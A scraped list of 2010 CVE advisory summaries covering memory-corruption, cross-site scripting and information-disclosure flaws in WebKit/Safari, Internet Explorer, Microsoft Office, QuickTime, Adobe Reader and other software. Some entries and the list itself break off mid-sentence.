CVE-2010-1763. [CVE-2010-1764] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, follows multiple redirections during form submission, which allows remote web servers to obtain sensitive information by recording the form data. [CVE-2010-1763] Unspecified vulnerability in WebKit in Apple iTunes before 9.2 on Windows has unknown impact and attack vectors, a different vulnerability than CVE-2010-1387 and CVE-2010-1769. [CVE-2010-1762] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving HTML in a TEXTAREA element. [CVE-2010-1761] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving HTML document subtrees. [CVE-2010-1759] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the Node.normalize method. [CVE-2010-1758] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving DOM Range objects. [CVE-2010-1750] Use-after-free vulnerability in Apple Safari before 5.0 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to improper window management. [CVE-2010-1749] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the Cascading Style Sheets (CSS) run-in property and multiple invocations of a destructor for a child element that has been referenced multiple times. [CVE-2010-1728] Opera before 10.53 on Windows and Mac OS X does not properly handle a series of document modifications that occur asynchronously, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via JavaScript that writes <marquee> sequences in an infinite loop, leading to attempted use of uninitialized memory. NOTE: this might overlap CVE-2006-6955. [CVE-2010-1681] Buffer overflow in VISIODWG.DLL before 10.0.6880.4 in Microsoft Office Visio allows user-assisted remote attackers to execute arbitrary code via a crafted DXF file, a different vulnerability than CVE-2010-0254 and CVE-2010-0256. [CVE-2010-1508] Heap-based buffer overflow in Apple QuickTime before 7.6.9 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Track Header (aka tkhd) atoms. [CVE-2010-1489] The XSS Filter in Microsoft Internet Explorer 8 does not properly perform neutering for the SCRIPT tag, which allows remote attackers to conduct cross-site scripting (XSS) attacks against web sites that have no inherent XSS vulnerabilities, a different issue than CVE-2009-4074. [CVE-2010-1423] Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when running on Windows and possibly on Linux, allows remote attackers to execute arbitrary code via the (1) -J or (2) -XXaltjvm argument to javaws.exe, which is processed by the launch method. NOTE: some of these details are obtained from third party information. [CVE-2010-1422] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle changes to keyboard focus that occur during processing of key press events, which allows remote attackers to force arbitrary key presses via a crafted HTML document. [CVE-2010-1421] The execCommand JavaScript function in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly restrict remote execution of clipboard commands, which allows remote attackers to modify the clipboard via a crafted HTML document. [CVE-2010-1419] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows user-assisted remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving a certain window close action that occurs during a drag-and-drop operation. [CVE-2010-1418] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via a FRAME element with a SRC attribute composed of a javascript: sequence preceded by spaces. [CVE-2010-1417] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via HTML content that contains multiple :after pseudo-selectors. [CVE-2010-1416] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly restrict the reading of a canvas that contains an SVG image pattern from a different web site, which allows remote attackers to read images from other sites via a crafted canvas, related to a "cross-site image capture issue." [CVE-2010-1415] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly handle libxml contexts, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document, related to an "API abuse issue." [CVE-2010-1414] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the removeChild DOM method. [CVE-2010-1413] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, sends NTLM credentials in cleartext in unspecified circumstances, which allows man-in-the-middle attackers to obtain sensitive information via unspecified vectors. [CVE-2010-1412] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to hover events. [CVE-2010-1410] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via an SVG document with nested use elements. [CVE-2010-1409] Incomplete blacklist vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to trigger disclosure of data over IRC via vectors involving an IRC service port. [CVE-2010-1408] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to bypass intended restrictions on outbound connections to "non-default TCP ports" via a crafted port number, related to an "integer truncation issue." NOTE: this may overlap CVE-2010-1099. [CVE-2010-1406] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, sends an https URL in the Referer header of an http request in certain circumstances involving https to http redirection, which allows remote HTTP servers to obtain potentially sensitive information via standard HTTP logging, a related issue to CVE-2010-0660. [CVE-2010-1405] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML element that has custom vertical positioning. [CVE-2010-1404] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an SVG document that contains recursive Use elements, which are not properly handled during page deconstruction. [CVE-2010-1403] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses uninitialized memory during the handling of a use element in an SVG document, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted document containing XML that triggers a parsing error, related to ProcessInstruction. [CVE-2010-1402] Double free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to an event listener in an SVG document, related to duplicate event listeners, a timer, and an AnimateTransform object. [CVE-2010-1401] Use-after-free vulnerability in the Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving the :first-letter pseudo-element. [CVE-2010-1400] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving caption elements. [CVE-2010-1399] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, accesses uninitialized memory during a selection change on a form input element, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted HTML document. [CVE-2010-1398] WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not properly perform ordered list insertions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted HTML document, related to the insertion of an unspecified element into an editable container and the access of an uninitialized element. [CVE-2010-1397] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to a layout change during selection rendering and the DOCUMENT_POSITION_DISCONNECTED attribute in a container of an unspecified type. [CVE-2010-1396] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the contentEditable attribute and removing container elements. [CVE-2010-1395] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving DOM constructor objects, related to a "scope management issue." [CVE-2010-1394] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors involving HTML document fragments. [CVE-2010-1393] The Cascading Style Sheets (CSS) implementation in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to discover sensitive URLs via an HREF attribute associated with a redirecting URL. [CVE-2010-1392] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to HTML buttons and the first-letter CSS style. [CVE-2010-1391] Multiple directory traversal vulnerabilities in the (a) Local Storage and (b) Web SQL database implementations in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allow remote attackers to create arbitrary database files via vectors involving a (1) %2f and .. (dot dot) or (2) %5c and .. (dot dot) in a URL. [CVE-2010-1390] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors related to improper UTF-7 canonicalization, and lack of termination of a quoted string in an HTML document. [CVE-2010-1389] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows user-assisted remote attackers to inject arbitrary web script or HTML via vectors involving a (1) paste or (2) drag-and-drop operation for a selection. [CVE-2010-1387] Use-after-free vulnerability in JavaScriptCore in WebKit in Apple iTunes before 9.2 on Windows, and Apple iOS before 4 on the iPhone and iPod touch, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to page transitions, a different vulnerability than CVE-2010-1763 and CVE-2010-1769. [CVE-2010-1385] Use-after-free vulnerability in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document. [CVE-2010-1384] Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, does not provide a warning about a (1) http or (2) https URL that contains a username and password, which makes it easier for remote attackers to conduct phishing attacks via a crafted URL. [CVE-2010-1383] CFNetwork in Apple Safari before 5.0.6 on Windows allows remote web servers to execute arbitrary code by replaying the NTLM credentials of a client user, related to a "credential reflection" issue. [CVE-2010-1322] The merge_authdata function in kdc_authdata.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) 1.8.x before 1.8.4 does not properly manage an index into an authorization-data list, which allows remote attackers to cause a denial of service (daemon crash), or possibly obtain sensitive information, spoof authorization, or execute arbitrary code, via a TGS request that triggers an uninitialized pointer dereference, as demonstrated by a request from a Windows Active Directory client. [CVE-2010-1295] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2202, CVE-2010-2207, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211, and CVE-2010-2212. [CVE-2010-1285] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, allow attackers to execute arbitrary code via unspecified manipulations involving the newclass (0x58) operator and an "invalid pointer vulnerability" that triggers memory corruption, a different vulnerability than CVE-2010-2168 and CVE-2010-2201. [CVE-2010-1262] Microsoft Internet Explorer 6 SP1 and SP2, 7, and 8 allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, related to the CStyleSheet object and a free of the root container, aka "Memory Corruption Vulnerability." [CVE-2010-1261] The IE8 Developer Toolbar in Microsoft Internet Explorer 8 SP1, SP2, and SP3 allows user-assisted remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-1260] The IE8 Developer Toolbar in Microsoft Internet Explorer 8 SP1, SP2, and SP3 allows user-assisted remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Element Memory Corruption Vulnerability." [CVE-2010-1259] Microsoft Internet Explorer 6 SP1 and SP2, 7, and 8 allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-1258] Microsoft Internet Explorer 6, 7, and 8 does not properly determine the origin of script code, which allows remote attackers to execute script in an unintended domain or security zone, and obtain sensitive information, via unspecified vectors, aka "Event Handler Cross-Domain Vulnerability." [CVE-2010-1257] Cross-site scripting (XSS) vulnerability in the toStaticHTML API, as used in Microsoft Office InfoPath 2003 SP3, 2007 SP1, and 2007 SP2 [CVE-2010-1256] Unspecified vulnerability in Microsoft IIS 6.0, 7.0, and 7.5, when Extended Protection for Authentication is enabled, allows remote authenticated users to execute arbitrary code via unknown vectors related to "token checking" that trigger memory corruption, aka "IIS Authentication Memory Corruption Vulnerability." [CVE-2010-1254] The installation for Microsoft Open XML File Format Converter for Mac sets insecure ACLs for the /Applications folder, which allows local users to execute arbitrary code by replacing the executable with a Trojan Horse, aka "Mac Office Open XML Permissions Vulnerability." [CVE-2010-1253] Microsoft Office Excel 2002 SP3, 2007 SP1, and SP2 [CVE-2010-1252] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Excel file, aka "Excel String Variable Vulnerability." [CVE-2010-1251] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Excel file, aka "Excel Record Stack Corruption Vulnerability." [CVE-2010-1250] Heap-based buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with malformed (1) EDG (0x88) and (2) Publisher (0x89) records, aka "Excel EDG Memory Corruption Vulnerability." [CVE-2010-1249] Buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed ExternName (0x23) record, aka "Excel Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0823 and CVE-2010-1247. [CVE-2010-1248] Buffer overflow in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed HFPicture (0x866) record, aka "Excel HFPicture Memory Corruption Vulnerability." [CVE-2010-1247] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 allows remote attackers to execute arbitrary code via an Excel file with a malformed RTD (0x813) record that triggers heap corruption, aka "Excel Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0823 and CVE-2010-1249. [CVE-2010-1246] Stack-based buffer overflow in Microsoft Office Excel 2002 SP3 allows remote attackers to execute arbitrary code via an Excel file with a malformed RTD (0x813) record, aka "Excel RTD Memory Corruption Vulnerability." [CVE-2010-1245] Unspecified vulnerability in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed SxView (0xB0) record, aka "Excel Record Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0824 and CVE-2010-0821. [CVE-2010-1241] Heap-based buffer overflow in the custom heap management system in Adobe Reader and Acrobat 9.x before 9.3.2, and 8.x before 8.2.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted PDF document, aka FG-VD-10-005. [CVE-2010-1240] Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, do not restrict the contents of one text field in the Launch File warning dialog, which makes it easier for remote attackers to trick users into executing an arbitrary local program that was specified in a PDF document, as demonstrated by a text field that claims that the Open button will enable the user to read an encrypted message. [CVE-2010-1184] The Microsoft wireless keyboard uses XOR encryption with a key derived from the MAC address, which makes it easier for remote attackers to obtain keystroke information and inject arbitrary commands via a nearby wireless device, as demonstrated by Keykeriki 2. [CVE-2010-1140] The USB service in VMware Workstation 7.0 before 7.0.1 build 227600 and VMware Player 3.0 before 3.0.1 build 227600 on Windows might allow host OS users to gain privileges by placing a Trojan horse program at an unspecified location on the host OS disk. [CVE-2010-1138] The virtual networking stack in VMware Workstation 7.0 before 7.0.1 build 227600, VMware Workstation 6.5.x before 6.5.4 build 246459 on Windows, VMware Player 3.0 before 3.0.1 build 227600, VMware Player 2.5.x before 2.5.4 build 246459 on Windows, VMware ACE 2.6 before 2.6.1 build 227600 and 2.5.x before 2.5.4 build 246459, VMware Server 2.x, and VMware Fusion 3.0 before 3.0.1 build 232708 and 2.x before 2.0.7 build 246742 allows remote attackers to obtain sensitive information from memory on the host OS by examining received network packets, related to interaction between the guest OS and the host vmware-vmx process. [CVE-2010-1131] JavaScriptCore.dll, as used in Apple Safari 4.0.5 on Windows XP SP3, allows remote attackers to cause a denial of service (application crash) via an HTML document composed of many successive occurrences of the <object> substring. [CVE-2010-1127] Microsoft Internet Explorer 6 and 7 does not initialize certain data structures during execution of the createElement method, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted JavaScript code, as demonstrated by setting the (1) outerHTML or (2) value property of an object returned by createElement. [CVE-2010-1119] Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, Safari before 4.1 on Mac OS X 10.4, and Safari on Apple iPhone OS allows remote attackers to execute arbitrary code or cause a denial of service (application crash), or read the SMS database or other data, via vectors related to "attribute manipulation," as demonstrated by Vincenzo Iozzo and Ralf Philipp Weinmann during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1034] Unspecified vulnerability in HP System Management Homepage (SMH) 6.0 before 6.0.0-95 on Linux, and 6.0 before 6.0.0.96 on Windows, allows remote authenticated users to obtain sensitive information, modify data, and cause a denial of service via unknown vectors. [CVE-2010-0925] cfnetwork.dll 1.450.5.0 in CFNetwork, as used by safari.exe 531.21.10 in Apple Safari 4.0.4 on Windows, allows remote attackers to cause a denial of service (application crash) via a long string in the SRC attribute of a (1) IMG or (2) IFRAME element. [CVE-2010-0924] cfnetwork.dll 1.450.5.0 in CFNetwork, as used by safari.exe 531.21.10 in Apple Safari 4.0.3 and 4.0.4 on Windows, allows remote attackers to cause a denial of service (application crash) via a long string in the BACKGROUND attribute of a BODY element. [CVE-2010-0903] Unspecified vulnerability in the Net Foundation Layer component in Oracle Database Server 9.2.0.8, 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1, when running on Windows, allows remote attackers to affect availability via unknown vectors. [CVE-2010-0900] Unspecified vulnerability in the Network Layer component in Oracle Database Server 9.2.0.8, 10.1.0.5, 10.2.0.4, 11.1.0.7, and 11.2.0.1, when running on Windows, allows remote attackers to affect availability via unknown vectors. [CVE-2010-0824] Unspecified vulnerability in Microsoft Office Excel 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via an Excel file with a malformed WOPT (0x80B) record, aka "Excel Record Memory Corruption Vulnerability," a different vulnerability than CVE-2010-0821 and CVE-2010-1245. [CVE-2010-0823] Unspecified vulnerability in Microsoft Office Excel 2002 SP3, 2003 SP3, 2007 SP1 and SP2 [CVE-2010-0822] Stack-based buffer overflow in Microsoft Office Excel 2002 SP3, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via an Excel file with a crafted OBJ (0x5D) record, aka "Excel Object Stack Overflow Vulnerability." [CVE-2010-0821] Unspecified vulnerability in Microsoft Office Excel 2002 SP3, 2003 SP3, 2007 SP1 and SP2 [CVE-2010-0817] Cross-site scripting (XSS) vulnerability in _layouts/help.aspx in Microsoft SharePoint Server 2007 12.0.0.6421 and possibly earlier, and SharePoint Services 3.0 SP1 and SP2, versions, allows remote attackers to inject arbitrary web script or HTML via the cid0 parameter. [CVE-2010-0816] Integer overflow in inetcomm.dll in Microsoft Outlook Express 5.5 SP2, 6, and 6 SP1 [CVE-2010-0815] VBE6.DLL in Microsoft Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Visual Basic for Applications (VBA), and VBA SDK 6.3 through 6.5 does not properly search for ActiveX controls that are embedded in documents, which allows remote attackers to execute arbitrary code via a crafted document, aka "VBE6.DLL Stack Memory Corruption Vulnerability." [CVE-2010-0814] The Microsoft Access Wizard Controls in ACCWIZ.dll in Microsoft Office Access 2003 SP3 and 2007 SP1 and SP2 do not properly interact with the memory-allocation approach used by Internet Explorer during instantiation, which allows remote attackers to execute arbitrary code via a web site that references multiple ActiveX controls, as demonstrated by the ImexGrid and FieldList controls, aka "Access ActiveX Control Vulnerability." [CVE-2010-0807] Microsoft Internet Explorer 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, leading to memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2010-0806] Use-after-free vulnerability in the Peer Objects component (aka iepeers.dll) in Microsoft Internet Explorer 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via vectors involving access to an invalid pointer after the deletion of an object, as exploited in the wild in March 2010, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0732] gdk/gdkwindow.c in GTK+ before 2.18.5, as used in gnome-screensaver before 2.28.1, performs implicit paints on windows of type GDK_WINDOW_FOREIGN, which triggers an X error in certain circumstances and consequently allows physically proximate attackers to bypass screen locking and access an unattended workstation by pressing the Enter key many times. [CVE-2010-0716] _layouts/Upload.aspx in the Documents module in Microsoft SharePoint before 2010 uses URLs with the same hostname and port number for a web site's primary files and individual users' uploaded files (aka attachments), which allows remote authenticated users to leverage same-origin relationships and conduct cross-site scripting (XSS) attacks by uploading TXT files, a related issue to CVE-2008-5026. NOTE: the vendor disputes the significance of this issue, because cross-domain isolation can be implemented when needed. [CVE-2010-0705] Aavmker4.sys in avast! 4.8 through 4.8.1368.0 and 5.0 before 5.0.418.0 running on Windows 2000 and XP does not properly validate input to IOCTL 0xb2d60030, which allows local users to cause a denial of service (system crash) or execute arbitrary code to gain privileges via IOCTL requests using crafted kernel addresses that trigger memory corruption. [CVE-2010-0657] Google Chrome before 4.0.249.78 on Windows does not perform the expected encoding, escaping, and quoting for the URL in the --app argument in a desktop shortcut, which allows user-assisted remote attackers to execute arbitrary programs or obtain sensitive information by tricking a user into creating a crafted shortcut. [CVE-2010-0652] Microsoft Internet Explorer permits cross-origin loading of CSS stylesheets even when the stylesheet download has an incorrect MIME type and the stylesheet document is malformed, which allows remote HTTP servers to obtain sensitive information via a crafted document. [CVE-2010-0650] WebKit, as used in Google Chrome before 4.0.249.78 and Apple Safari, allows remote attackers to bypass intended restrictions on popup windows via crafted use of a mouse click event. [CVE-2010-0559] The default configuration of Oracle OpenSolaris snv_91 through snv_131 allows attackers to have an unspecified impact via vectors related to using kclient to join a Windows Active Directory domain. [CVE-2010-0558] The default configuration of Oracle OpenSolaris snv_77 through snv_131 allows attackers to have an unspecified impact via vectors related to using smbadm to join a Windows Active Directory domain. [CVE-2010-0555] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, 7, and 8 does not prevent rendering of non-HTML local files as HTML documents, which allows remote attackers to bypass intended access restrictions and read arbitrary files via vectors involving the product's use of text/html as the default content type for files that are encountered after a redirection, aka the URLMON sniffing vulnerability, a variant of CVE-2009-1140 and related to CVE-2008-1448. [CVE-2010-0544] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to inject arbitrary web script or HTML via vectors related to a malformed URL. [CVE-2010-0536] Apple QuickTime before 7.6.6 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted BMP image. [CVE-2010-0532] Race condition in the installation package in Apple iTunes before 9.1 on Windows allows local users to gain privileges by replacing an unspecified file with a Trojan horse. [CVE-2010-0530] Apple QuickTime before 7.6.9 on Windows sets weak permissions for the Apple Computer directory in the profile of a user account, which allows local users to obtain sensitive information by reading files in this directory. [CVE-2010-0529] Heap-based buffer overflow in QuickTime.qts in Apple QuickTime before 7.6.6 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PICT image with a BkPixPat opcode (0x12) containing crafted values that are used in a calculation for memory allocation. [CVE-2010-0528] Apple QuickTime before 7.6.6 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted color tables in a movie file, related to malformed MediaVideo data, a sample description atom (STSD), and a crafted length value. [CVE-2010-0527] Integer overflow in Apple QuickTime before 7.6.6 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PICT image. [CVE-2010-0494] Cross-domain vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 allows user-assisted remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via a crafted HTML document in a situation where the client user drags one browser window across another browser window, aka "HTML Element Cross-Domain Vulnerability." [CVE-2010-0492] Use-after-free vulnerability in mstime.dll in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via vectors related to the TIME2 behavior, the CTimeAction object, and destruction of markup, leading to memory corruption, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-0491] Use-after-free vulnerability in Microsoft Internet Explorer 5.01 SP4, 6, and 6 SP1 allows remote attackers to execute arbitrary code by changing unspecified properties of an HTML object that has an onreadystatechange event handler, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-0490] Microsoft Internet Explorer 6, 6 SP1, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0489] Race condition in Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via a crafted HTML document that triggers memory corruption, aka "Race Condition Memory Corruption Vulnerability." [CVE-2010-0488] Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 does not properly handle unspecified "encoding strings," which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site, aka "Post Encoding Information Disclosure Vulnerability." [CVE-2010-0479] Buffer overflow in Microsoft Office Publisher 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted Publisher file, aka "Microsoft Office Publisher File Conversion TextBox Processing Buffer Overflow Vulnerability." [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers." [CVE-2010-0284] Directory traversal vulnerability in the getEntry method in the PortalModuleInstallManager component in a servlet in nps.jar in the Administration Console (aka Access Management Console) in Novell Access Manager 3.1 before 3.1.2-281 on Windows allows remote attackers to create arbitrary files with any contents, and consequently execute arbitrary code, via a .. (dot dot) in a parameter, aka ZDI-CAN-678. [CVE-2010-0267] Microsoft Internet Explorer 6, 6 SP1, and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-0266] Microsoft Office Outlook 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 does not properly verify e-mail attachments with a 